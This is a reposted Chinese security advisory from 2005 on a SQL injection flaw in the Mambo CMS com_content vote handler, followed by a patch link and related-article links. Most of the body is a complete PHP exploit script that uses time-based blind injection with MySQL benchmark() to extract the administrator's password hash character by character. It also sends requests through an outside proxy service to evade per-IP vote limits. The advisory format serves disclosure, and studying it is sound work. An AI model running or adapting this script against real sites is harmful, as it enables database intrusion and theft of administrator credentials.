mambo 服务商规定的mysql密码,Mambo com_content远程SQL注入漏洞
发布日期:2005-06-16更新日期:2005-06-16受影响系统:
Mambo Mambo Open Source <= 4.5.2.2不受影响系统:
Mambo Mambo Open Source 4.5.2.3描述:
BUGTRAQ ID: 13966Mambo是一款开放源代码的WEB内容管理系统。Mambo的com_contents中存在严重的SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。 -- content.php -- 100 case 'vote': 101 recordVote ( $url , $user_rating , $cid , $database); 102 break; ... 1478 $query = "UPDATE #__content_rating" 1479 . "\n SET rating_count = rating_count + 1," 1450 . "\n rating_sum = rating_sum + $user_rating," 1451 . "\n lastip = '$currip'" 1452 . "\n WHERE content_id = ". $cid 1453 ; ----------------在1450行$user_rating未经任何验证便使用用户提供的数据,导致用户可以获得敏感信息。测试方法:
警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!*/if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit;}ini_set("max_execution_time","999999");$benchcount = 150000;$aid= 62;$cid = 2;$charmap = array (48,49,50,51,52,53,54,55,56,57, 97,98,99,100,101,102, 103,104,105, 106,107,108,109,110,111,112,113, 114,115,116,117,118,119,120,121,122 ); if($argv[1]){ $url = $argv[1]; if ($argv[2]) $aid = $argv[2]; if ($argv[3]) $benchcount = $argv[3]; if ($argv[4]) $proxy = $argv[4]; }else { echo "Usage: ".$argv[0]." [userid] [benchmarkcount] [proxy]\n\n"; echo "\tURL\t URL to mambo site (ex: http://127.0.0.1)\n"; echo "\taid\t userid to get (default: 62 (admin))\n"; echo "\tbenchmarkcount\t benchmark count (default: 150000)\n"; echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n"; exit;}// rate from different ip (using http://projectbypass.com)$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op \tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);// standard page loading time$start = time();$ch = curl_init();if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);$res = curl_exec($ch);curl_close ($ch);$stop = time();$sloadtime = floatval($stop - $start);echo "standard page loading =".$sloadtime."\n"; // benchmark page loading time$start = time();$ch = curl_init();if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid \=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);$stop = time();$bloadtime = floatval($stop - $start);echo "bencmark page loading =".$bloadtime."\n"; // check if SQL query failedif (ereg("DB function failed",$res)){ echo "[x] mysql < 4.1 detected - not exploitable\n"; exit();}if ($bloadtime <= $sloadtime + 2){ echo "[x] increase your benchmark count\n"; exit();}echo "Take your time for Teh Tarik... please wait ...\n\n";echo "Result:\n";echo "\tUserid = $aid\n";echo "\tPassword Hash = ";// starting fetch password$benchcount = $benchcount*2; for($i= 1;$i< 33;$i++){ foreach ($charmap as $char){ $start = time(); echo chr($char); $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item \id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \ntent_id=$cid/*"); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $stop = time(); $xloadtime = floatval($stop - $start); if (floatval($xloadtime) > $bloadtime){ $hash .= chr($char); break 1; } else { echo chr(8); } if ($char == 103){ echo "\n\n\tNot Vulnerable or Something wrong occur ...\n"; exit; } }}echo "\n";?>建议:
厂商补丁:Mambo-----目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载4.5.2.3版本:http://mamboforge.net/frs/download.php/6151/MamboV4.5.2.3-stable.tar.g z
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!
免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!
mambo 服务商规定的mysql密码,Mambo com_content远程SQL注入漏洞相关推荐
- mysql注入漏洞语句,web安全之sql注入漏洞
概念 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.通俗地讲,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力 ...
- 绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞
被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程 SQL注入漏洞 01-数字型注入 http://localhost:32774/sqli ...
- 【Mysql优化安全】防止sql注入
[Mysql安全]防止sql注入 (1)什么是sql注入 (2)寻找sql注入的方法 (3)mybatis是如何做到防止sql注入的 (3.1)sql对比 (3.2)简单分析 (3.3)底层实现原理 ...
- 米拓5.3 mysql支持off,Metinfo 5.3.17 前台SQL注入漏洞分析
Metinfo 8月1日升级了版本,修复了一个影响小于等于5.3.17版本(几乎可以追溯到所有5.x版本)的SQL注入漏洞.这个SQL注入漏洞不受软WAF影响,可以直接获取数据,影响较广. 漏洞出现在 ...
- 【安全】【SQL注入漏洞】通过sql注入获取数据库管理员密码
本博客中使用封神台靶标系统进行演示,靶标系统网站. 一.判断网站是否存在sql注入漏洞 1.在地址栏写入?id=1 and 1=1,回车 页面返回正常. 2.在地址栏写入?id=1 and 1=2,回 ...
- php mysql 注入漏洞_PHP安全:SQL注入漏洞防护
原标题:PHP安全:SQL注入漏洞防护 SQL注入是最危险的漏洞之一,但也是最好防护的漏洞之一.本文介绍在PHP的编码中合理地使用MySQL提供的预编译进行SQL注入防护,在PHP中使用PHP数据对象 ...
- MySQL攻略 - JDBC程序SQL注入,PreparedStatement接口详解与案例练习,JDBC相关API小结
文章目录 SQL注入 Statement详解 基本介绍 Navicat演示SQL注入 JDBC演示SQL注入 PreparedStatement详解 基本介绍 预处理好处 预处理案例(selete语句 ...
- mysql sql注入漏洞修复_从Java角度修复SQL注入漏洞
很多情况因为过滤不严导致很多网站存在sql注入,这里以用户登陆为例,简单举例 首先创建一个测试的数据库 比较基础,不写创建过程了 java代码如下: packagecn.basic.jdbc;impo ...
- php万能注入密码,php下的SQL注入万能用户名和密码
1.针对有单引号的情况 : 万能密码 : select * from users where username='xxxx' and password='xxxxxx' or 1='1'; 万能用户名 ...
最新文章
- VScode 插件、配置记录
- MySQL字符串截取函数
- android导航条高度修改,Android中修改TabLayout底部导航条Indicator长短的方法
- Java HashMap工作原理深入探讨
- 最后关于nginx+passenger+ror+mysql的安装部署过程
- Cisco IOS防火墙的安全规则和配置方案
- AvtiveMQ与SpringBoot结合
- 常用的流式布局FlowLayout
- php后缀名隐藏,php隐藏后缀名的方法是什么
- python3----字典
- Delphi 小知识汇总
- CISCO 路由器启动自动配置
- 【语音编码】基于matlab ADPCM编解码【含Matlab源码 553期】
- 人体姿态识别研究综述(详细归纳!)
- php 获取客户端的浏览器信息
- mysql存储视频_特殊格式文件(视频、声音等) 在数据库中的存储方式
- 树形导航栏(折叠)(jquery)
- ue4+html5动态加载pak,UE4 pak生成和加载
- Tiled游戏地图编辑器
- 【从零开始学深度学习编译器】九,TVM的CodeGen流程